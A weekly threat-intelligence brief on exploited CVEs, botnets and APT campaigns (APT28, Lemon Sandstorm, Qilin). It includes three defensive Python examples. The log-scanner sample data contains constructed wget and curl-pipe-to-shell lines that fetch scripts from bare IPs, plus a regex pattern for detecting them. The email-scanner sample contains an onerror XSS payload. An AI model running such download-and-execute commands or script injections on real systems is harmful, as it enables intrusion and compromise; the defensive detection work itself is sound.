Weekly Cyber Threat Brief - Surging Exploits and State-Backed Intrusions

May 23, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

This week’s cybersecurity landscape saw a surge in threat actor activity, as nine vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The list spans critical flaws across Ivanti, Srimax Output Messenger, Synacor Zimbra, ZKTeco BioTime, Samsung MagicINFO, and MDaemon Email Server, underscoring the growing risks to enterprise communication, collaboration, and operational platforms. The diversity of affected technologies highlights the increasing sophistication and reach of exploitation campaigns. Meanwhile, Mozilla has issued urgent fixes for two vulnerabilities in Firefox that were exploited as zero-days during the Pwn2Own Berlin 2025 hacking contest, highlighting the need for rapid patch deployment in response to emerging threats.

Botnet activity surged, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeting flaws in platforms such as Cloud Gateway, GitLab, and PHP services. In parallel, IoT malware including Bashlite, BrickerBot, Tsunami, and Mirai focused on compromising Eir D1000 modems, rapidly scaling up their infected device networks.  

State-sponsored cyber activity remained a key concern this week, with multiple campaigns linked to advanced persistent threat (APT) groups. ESET attributed a recent espionage operation dubbed Operation RoundPress to APT28, which leveraged vulnerabilities in MDaemon Email Server and Synacor Zimbra Collaboration Suite. Meanwhile, FortiGuard Incident Response highlighted a nearly two-year-long intrusion by an Iranian-backed actor targeting Middle Eastern critical infrastructure, exploiting flaws in ZKTeco BioTime. In a separate discovery, OP Innovate revealed that a critical vulnerability in SAP NetWeaver Visual Composer was exploited weeks before public disclosure, likely by the Qilin ransomware group. Complementing these findings, a joint CISA advisory detailed an ongoing campaign by APT28 that actively exploits Roundcube vulnerabilities as part of broader cyber espionage efforts against Western logistics and tech firms.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.

CVE-2025-4632
A Path Traversal Vulnerability in Samsung MagicINFO 9 Server allows attackers to write arbitrary files with system-level privileges, potentially enabling full system compromise. With a critical CVSS score of 9.8, this flaw affects versions prior to 21.1052. It was observed being exploited in the wild soon after a proof-of-concept was released by SSD Disclosure on April 30, 2025. In some cases threat actors have leveraged this flaw to deploy the Mirai botnet, highlighting its severity and widespread impact. Due to confirmed active exploitation, it has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-4664  
A critical Insufficient Policy Enforcement Vulnerability affecting Google Chrome’s Loader logic has been uncovered, enabling threat actors to bypass security restrictions and potentially execute arbitrary code or escape the browser sandbox. The flaw poses serious security implications, particularly if leveraged to gain deeper access to user systems. Public disclosure via an X post suggests possible active exploitation in the wild prior to mitigation. In response, Google issued emergency updates, patching the flaw in Chrome versions 136.0.7103.113/.114 for Windows and Mac, and 136.0.7103.113 for Linux. Given the confirmed exploitation, the vulnerability has been officially listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, reinforcing the urgency for all users to apply the latest updates without delay.

CVE-2025-4918
An Out-of-Bounds Access Vulnerability in Mozilla Firefox has been identified as a high-severity flaw, rated 7.5 on the CVSS scale, affecting versions prior to Firefox 138.0.4, Firefox ESR 128.10.1, and Firefox ESR 115.23.1. The flaw, which was exploited as a zero-day during the Pwn2Own Berlin 2025 hacking competition, involves improper handling of JavaScript Promise objects, potentially enabling attackers to perform arbitrary memory reads or writes. Such unauthorized access could lead to the exposure of sensitive data or trigger memory corruption, ultimately paving the way for remote code execution. While the impact was initially limited, immediate patching is strongly recommended to mitigate potential risks.

CVE-2025-4919
An Out-of-Bounds Access Vulnerability in Mozilla Firefox has been identified with a high CVSS score of 8.8, affecting versions prior to Firefox 138.0.4, Firefox ESR 128.10.1, and Firefox ESR 115.23.1. This flaw, which was exploited as a zero-day during the Pwn2Own Berlin 2025 hacking competition, stems from improper handling of array index sizes, allowing attackers to manipulate JavaScript objects. Successful exploitation could lead to unauthorized memory access, exposing sensitive data or causing memory corruption that may enable code execution. Mozilla has issued security updates to address the issue, and users are strongly urged to apply the patches promptly to mitigate potential threats.

CVE-2025-27920
A Directory Traversal Vulnerability was identified in Srimax Output Messenger, affecting versions prior to 2.0.63. With a high CVSS score of 7.2, this flaw allows attackers to access files outside the intended directory structure, potentially exposing configuration files or enabling arbitrary file access. The vulnerability resides in the file upload mechanism of the Output Drive feature, which is designed to facilitate file sharing between users and the server. By exploiting this weakness, an authenticated user could upload malicious files directly into the server's startup directory (C:\Program Files\Output Messenger Server\OfflineMessages\Temp\1\File), leading to remote code execution. Microsoft security researchers have attributed zero-day exploitation of this flaw to the threat actor Marbled Dust, who used it as part of a targeted intrusion campaign. The issue has since been addressed in version 2.0.63, and the vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation in the wild.
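Both traversal flaws above, the MagicINFO arbitrary file write and the Output Messenger upload into a startup directory, come down to a server joining an attacker-controlled filename onto a base directory without confirming that the result still lies inside it. As an added illustration, not code from the brief or from either vendor, the Python below shows the containment check a file-handling endpoint should make before reading or writing; the base directory and the sample filenames are constructed for the example.

```python
"""Added example (not from the brief, Samsung, or Srimax): reject path
traversal in user-supplied filenames before reading or writing under an
application's base directory."""
import os
from pathlib import PureWindowsPath
from typing import Optional

BASE_DIR = "/srv/app/uploads"  # constructed base directory for this example


def resolve_safely(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path for user_path inside base_dir, or None if it
    would escape base_dir.  Backslashes are treated as separators so a
    Windows-style '..\\..\\x' is handled the same way as '../../x'."""
    if "\x00" in user_path:
        return None  # NUL bytes truncate paths in some C-backed APIs
    normalised = user_path.replace("\\", "/")
    if normalised.startswith("/") or PureWindowsPath(user_path).drive:
        return None  # absolute paths and drive letters are never acceptable
    base = os.path.realpath(base_dir)
    # realpath collapses '..' segments and follows symlinks, so a symlink inside
    # base_dir that points outside it is rejected as well
    candidate = os.path.realpath(os.path.join(base, normalised))
    if not candidate.startswith(base + os.sep):
        return None  # the base directory itself is not an acceptable file
    return candidate


def triage(base_dir: str, names) -> dict:
    """Classify each candidate filename as 'allowed' or 'rejected'."""
    return {n: ("allowed" if resolve_safely(base_dir, n) else "rejected") for n in names}


if __name__ == "__main__":
    # Constructed inputs: one legitimate name and several traversal attempts
    samples = ["report.pdf", "sub/../report.pdf", "../../../etc/passwd",
               "..\\..\\Windows\\win.ini", "C:\\Windows\\win.ini", "/etc/passwd"]
    for name, verdict in triage(BASE_DIR, samples).items():
        print(f"{verdict:8} {name!r}")
```

The check is done on the fully resolved path rather than by looking for ".." in the input, because encoded separators, mixed separators and symlinks all defeat string matching but not a post-resolution prefix comparison.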

CVE-2025-42999  
A Deserialization Vulnerability has been identified in the SAP NetWeaver Visual Composer development server. With a critical CVSS score of 9.1, this flaw enables a privileged attacker to deserialize malicious input, potentially compromising the confidentiality, integrity, and availability of the host system. Notably, this issue follows the previously disclosed CVE-2025-31324, an unrestricted file upload vulnerability in the same component reported in April 2025, indicating continued risk within this module. The vulnerability has been added to the CISA KEV catalog, warranting urgent patching and mitigation measures.

CVE-2024-11182
A Cross-Site Scripting (XSS) Vulnerability has been identified in MDaemon Email Server, affecting versions prior to 24.5.1c. This flaw allows a remote attacker to inject and execute arbitrary JavaScript code by sending a specially crafted HTML email. Notably, no further user interaction is required beyond opening the malicious email, making exploitation highly feasible in real-world scenarios. The vulnerability exposes users to risks such as data theft, session hijacking, or unauthorized actions performed on behalf of the victim. Due to confirmed exploitation in the wild, this vulnerability has been added to the CISA KEV catalog, urging organizations to prioritize patching and upgrade to the latest secure version, 24.5.1.

CVE-2024-12987
An OS Command Injection Vulnerability has been identified in DrayTek Vigor routers, affecting models Vigor2960, Vigor300B, and Vigor3900. With a high CVSS score of 7.3, this flaw originates from an undocumented function reachable through /cgi-bin/mainfunction.cgi/apmcfgupload in the web management interface, which could allow a remote attacker to execute arbitrary system commands. DrayTek resolved the vulnerability in firmware version 1.5.1.5. It has recently been added to the CISA KEV catalog, underscoring the urgency for affected organizations to update their devices immediately.

CVE-2024-27443
A Cross-Site Scripting (XSS) Vulnerability has been discovered in the Synacor Zimbra Collaboration Suite (ZCS), specifically within the CalendarInvite feature of the classic webmail interface. This flaw affects versions 9.0 and 10.0 and originates from improper sanitization of the cif (Calendar Intended For) attribute used in email calendar invitations. Successful exploitation could allow malicious JavaScript code to be executed in the user's browser, potentially leading to data theft, session hijacking, or other client-side attacks. Zimbra has addressed the issue in version 9.0.0 Patch 39 and 10.0.7, and due to active exploitation, the vulnerability has been listed in the CISA KEV catalog, urging users to apply the necessary patches promptly.

CVE-2023-38950
A Path Traversal Vulnerability in ZKTeco BioTime v8.5.5 allows unauthenticated attackers to access arbitrary files by submitting specially crafted payloads. Rated with a high CVSS score of 7.5, this flaw permits bypassing standard access controls, potentially leading to unauthorized exposure of sensitive system files and a compromise of system confidentiality and integrity. BioTime is a time and attendance management platform that connects with thousands of ZKTeco’s standalone push communication devices via Ethernet, Wi-Fi, 3G, or 4G, and operates as a private cloud, enabling employee self-service through mobile apps and web browsers. Despite its wide enterprise adoption, no official patch has been issued by ZKTeco to remediate this vulnerability. Due to confirmed exploitation in the wild, it has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting the need for immediate defensive measures.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

CVE | Product | Severity | Title | Exploited in the wild | CISA KEV
CVE-2024-8503 | VICIdial | Critical | SQL injection vulnerability in VICIdial 2.14-917a leads to sensitive information disclosure | True | False
CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-4577 | PHP-CGI on Windows | High | Critical argument injection vulnerability in PHP on Windows servers | True | True
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True
CVE-2023-26067 | Lexmark devices | High | Improper input validation vulnerability in certain Lexmark devices through 2023-02-19 leads to remote code execution | True | False
CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise | True | False
CVE-2023-24488 | Citrix ADC and Citrix Gateway | Medium | Cross site scripting vulnerability in Citrix ADC and Citrix Gateway | True | False
CVE-2023-23752 | Joomla | Medium | Joomla! Improper Access Control Vulnerability | True | True
CVE-2023-26801 | LB-LINK | Critical | Command injection vulnerability in LB-LINK devices | True | False
CVE-2023-1020 | WP Live Chat Shoutbox WordPress plugin | Critical | Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQL Injection | False | False

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presenting the top 5 CVEs with payloads suggestive of botnet activity, such as fetching files with wget from raw IP addresses.

CVE | Product | Title | Exploit | Abused by Botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu
CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai
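The "wget with an IP address" payload pattern this section uses as a botnet indicator is straightforward to hunt for in web-server logs. As an added example, not code from the brief or from Loginsoft, the Python below URL-decodes each request line and flags wget or curl invocations that fetch from a bare IPv4 address rather than a hostname; the log lines are constructed and use documentation address ranges only.

```python
"""Added example (not from the brief or Loginsoft): flag web-server request
lines whose payload fetches a file with wget or curl from a bare IPv4 address,
the pattern the brief cites as suggestive of botnet activity."""
import re
from urllib.parse import unquote

# Constructed access-log lines; all addresses are from documentation ranges
SAMPLE_LOG = """\
203.0.113.10 - - [20/May/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.11 - - [20/May/2025:10:01:05 +0000] "POST /actuator/gateway/routes/x HTTP/1.1" 201 0 "wget http://198.51.100.7/x.sh -O /tmp/x.sh"
203.0.113.12 - - [20/May/2025:10:01:09 +0000] "GET /cgi-bin/test.cgi?cmd=cd%20%2Ftmp%3Bcurl%20-s%20http%3A%2F%2F198.51.100.8%2Fsh%20%7C%20sh HTTP/1.1" 404 0
203.0.113.13 - - [20/May/2025:10:01:12 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 2048
203.0.113.14 - - [20/May/2025:10:01:15 +0000] "GET /fetch?url=https://example.org/pkg.tar.gz HTTP/1.1" 200 100
"""

# wget/curl followed, within the same shell command, by a URL whose host is a
# dotted-quad IPv4 address (hostnames and CDN URLs are deliberately not matched)
FETCH_FROM_IP = re.compile(
    r"\b(wget|curl)\b[^;|&\n]*?https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/|\s|$)",
    re.IGNORECASE,
)


def flag_downloader_payloads(log_text: str) -> list:
    """Return (client_ip, tool, fetched_host) for every line containing an
    IP-hosted wget/curl fetch.  Lines are URL-decoded twice because payloads
    in query strings are often double-encoded."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        decoded = unquote(unquote(line))
        match = FETCH_FROM_IP.search(decoded)
        if match:
            hits.append((line.split()[0], match.group(1).lower(), match.group(2)))
    return hits


if __name__ == "__main__":
    for client, tool, host in flag_downloader_payloads(SAMPLE_LOG):
        print(f"{client} used {tool} to fetch from {host}")
```

Requiring a dotted-quad host keeps ordinary references to wget (the documentation page in line four) and legitimate hostname-based downloads out of the results, while the double decode catches the encoded form in the query string of line three.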

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.

Qilin-Linked Exploitation of SAP NetWeaver Zero-Day

OP Innovate has identified early, real-world exploitation of CVE-2025-31324, a critical unauthenticated file upload vulnerability in SAP NetWeaver Visual Composer, exploited weeks before public disclosure. The flaw, located in the /developmentserver/metadatauploader endpoint, allowed attackers likely linked to the Qilin Ransomware-as-a-Service group to upload JSP-based web shells via HTTP, gaining remote command execution. Access was achieved through an exposed SAP Metadata Uploader endpoint, likely due to a misconfigured load balancer. The incident underscores the urgent need to secure SAP environments and eliminate internet-exposed high-risk services.

CVE-2024-11182 and CVE-2024-27443

ESET has attributed a recent cyber espionage campaign, codenamed Operation RoundPress, to the Russian state-sponsored threat actor APT28, also known by numerous aliases such as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.

This operation targeted email communications by exploiting two cross-site scripting (XSS) vulnerabilities, CVE-2024-11182 and CVE-2024-27443, to exfiltrate sensitive data from specific webmail accounts. The campaign involved sending malicious emails that, when opened in a vulnerable webmail client, executed JavaScript code hidden within the HTML body of the message. While the email appeared benign on the surface, the code deployed an obfuscated payload known as "SpyPress", designed to capture webmail credentials and extract emails and contact lists from compromised accounts. Though the malware lacks persistence, it reactivates each time the infected email is viewed. To protect against threats like Operation RoundPress, users should avoid opening unexpected or suspicious emails, especially in webmail interfaces.
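The MDaemon and Zimbra XSS flaws described in the trending section, and the RoundPress campaign here, all hinge on active content surviving in the HTML body of a message that a webmail client then renders. As an added example, not taken from the brief, ESET or either vendor, the Python below parses the text/html part of a raw message and reports the constructs (script-like elements, on* event handlers, javascript:/data: URLs, srcdoc) that a mail gateway or filter should treat as suspicious before delivery; both sample messages are constructed.

```python
"""Added example (not from the brief, ESET, MDaemon or Zimbra): parse the HTML
part of an email and report active-content constructs a webmail XSS payload
would rely on, as a mail gateway or filter might do before delivery."""
from email import message_from_string
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}


class ActiveContentFinder(HTMLParser):
    """Collects findings such as 'tag:script', 'event:onerror', 'url:javascript:href'."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.findings.append(f"event:{lname}")
            elif lname == "srcdoc":
                self.findings.append("attr:srcdoc")
            elif lname in URL_ATTRS and value and ":" in value:
                # HTMLParser has already decoded entities; browsers also ignore
                # tabs/newlines inside a scheme, so drop non-alphanumerics too
                scheme = "".join(c for c in value.split(":", 1)[0] if c.isalnum()).lower()
                if scheme in SCRIPT_SCHEMES:
                    self.findings.append(f"url:{scheme}:{lname}")


def scan_html(html: str) -> list:
    finder = ActiveContentFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_message(raw_message: str) -> list:
    """Scan every text/html part of an RFC 822 message."""
    msg = message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            findings.extend(scan_html(part.get_payload(decode=True).decode(charset, "replace")))
    return findings


# Constructed sample messages
BENIGN_EMAIL = """From: sender@example.org
To: user@example.org
Subject: Invoice
Content-Type: text/html; charset="utf-8"

<html><body><p>Hello, your invoice is <a href="https://example.org/inv/1">here</a>.</p></body></html>
"""

SUSPICIOUS_EMAIL = """From: sender@example.org
To: user@example.org
Subject: Calendar invite
Content-Type: text/html; charset="utf-8"

<html><body><p>Meeting at 10:00</p>
<img src="x" onerror="doSomething()">
<a href="jav&#x09;ascript:void(0)">Accept</a>
</body></html>
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_EMAIL), ("suspicious", SUSPICIOUS_EMAIL)):
        print(label, scan_message(raw))
```

Working on the parsed tag stream rather than on regular expressions over the raw body matters here: the entity-encoded tab in the second sample's href is decoded by the parser, so the javascript: scheme is recognised even though the string "javascript:" never appears literally in the message.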

Lemon Sandstorm leverages ZKTeco BioTime vulnerabilities for Persistent Access

A prolonged cyber intrusion targeting a critical national infrastructure (CNI) entity in the Middle East has been attributed to an Iranian state-sponsored threat group. The campaign, active between May 2023 and February 2025, involved an extensive espionage operation and strategic network prepositioning, a technique commonly employed by advanced persistent threat (APT) actors to ensure long-term access to high-value networks. According to the FortiGuard Incident Response (FGIR) team, the tactics and tools used throughout the operation closely align with activity previously associated with the Iranian nation-state group Lemon Sandstorm. This threat actor is also known by several aliases, including Rubidium, Parisite, Pioneer Kitten, and UNC757.

Following a temporary eviction by the targeted organization, renewed intrusion attempts were observed beginning December 14, 2024. These efforts included the exploitation of multiple known vulnerabilities in ZKTeco BioTime systems, specifically CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952. In addition, a spear-phishing campaign was launched against 11 employees, aiming to collect Microsoft 365 credentials as a means of reestablishing access. These tactics demonstrate a persistent and adaptive adversary focused on maintaining a foothold within strategically important networks.

Russian Hackers Exploit Email and VPN Flaws to Target Ukraine Aid Logistics

A recent advisory from the Cybersecurity and Infrastructure Security Agency (CISA) has attributed an ongoing state-sponsored cyber espionage campaign to the Russian threat actor APT28, also known as BlueDelta, Fancy Bear, or Forest Blizzard. Active since 2022, this operation targets Western logistics companies and technology firms, particularly those involved in coordinating and transporting foreign assistance to Ukraine. The campaign, linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, employs a range of tactics, techniques, and procedures (TTPs), including exploitation of the Outlook NTLM vulnerability CVE-2023-23397, multiple Roundcube vulnerabilities CVE-2020-12641, CVE-2020-35730, CVE-2021-44026, and attacks against internet-facing corporate VPNs via public vulnerabilities and SQL injection. Additionally, exploitation of the WinRAR vulnerability CVE-2023-38831 has been observed. This broad targeting aligns with APT28’s previous campaigns against IP cameras in Ukraine and NATO border countries, underscoring the group’s focus on espionage activities within critical infrastructure sectors.

CVE | Severity | Title | Patch | Targeted By Malware | OSS
CVE-2025-31324 | Critical | Unrestricted File Upload Vulnerability in the SAP NetWeaver | Yes | Qilin Ransomware | False
CVE-2024-11182 | Medium | Cross-Site Scripting (XSS) Vulnerability in the MDaemon Email Server | Yes | Operation RoundPress, APT28 | False
CVE-2024-27443 | Medium | Cross-Site Scripting (XSS) Vulnerability in Synacor Zimbra Collaboration Suite (ZCS) | Yes | Operation RoundPress, APT28 | False
CVE-2023-23397 | Critical | Privilege Escalation Vulnerability in the Microsoft Office Outlook | Yes | Russian GRU 85th GTsSS military unit 26165 | False
CVE-2023-38831 | High | Code Execution Vulnerability in the RARLAB WinRAR | Yes | Russian GRU 85th GTsSS military unit 26165 | False
CVE-2023-38950 | High | Path Traversal Vulnerability in the ZKTeco BioTime | No | Lemon Sandstorm | False
CVE-2023-38951 | Critical | Path Traversal Vulnerability in the ZKTeco BioTime | No | Lemon Sandstorm | False
CVE-2023-38952 | High | Insecure Access Control Vulnerability in the ZKTeco BioTime | Yes | Lemon Sandstorm | False
CVE-2021-44026 | Critical | SQL Injection Vulnerability in the Roundcube Webmail | Yes | Russian GRU 85th GTsSS military unit 26165 |
CVE-2020-12641 | Critical | Remote Code Execution Vulnerability in the Roundcube Webmail | Yes | Russian GRU 85th GTsSS military unit 26165 | False
CVE-2020-35730 | Medium | Cross-Site Scripting (XSS) Vulnerability in the Roundcube Webmail | Yes | Russian GRU 85th GTsSS military unit 26165 | True

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database (NVD). The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID | Type of Vulnerability | Product | Reference
CVE-2025-22416 | Elevation of Privilege | Android | Resource
CVE-2025-26435 | Elevation of Privilege | Android | Resource
CVE-2024-49741 | Denial of Service | Android | Resource
CVE-2024-52948 | Cross-Site Request Forgery | Lemonldap-ng package | Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2025/05/15/cisa-adds-three-known-exploited-vulnerabilities-catalog
  2. https://blog.mozilla.org/security/2025/05/17/firefox-security-response-to-pwn2own-2025/
  3. https://www.cisa.gov/news-events/alerts/2025/05/19/cisa-adds-six-known-exploited-vulnerabilities-catalog
  4. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a  
  5. https://op-c.net/blog/sap-cve-2025-31324-qilin-breach/  
  6. https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf  
  7. https://www.welivesecurity.com/en/eset-research/operation-roundpress/
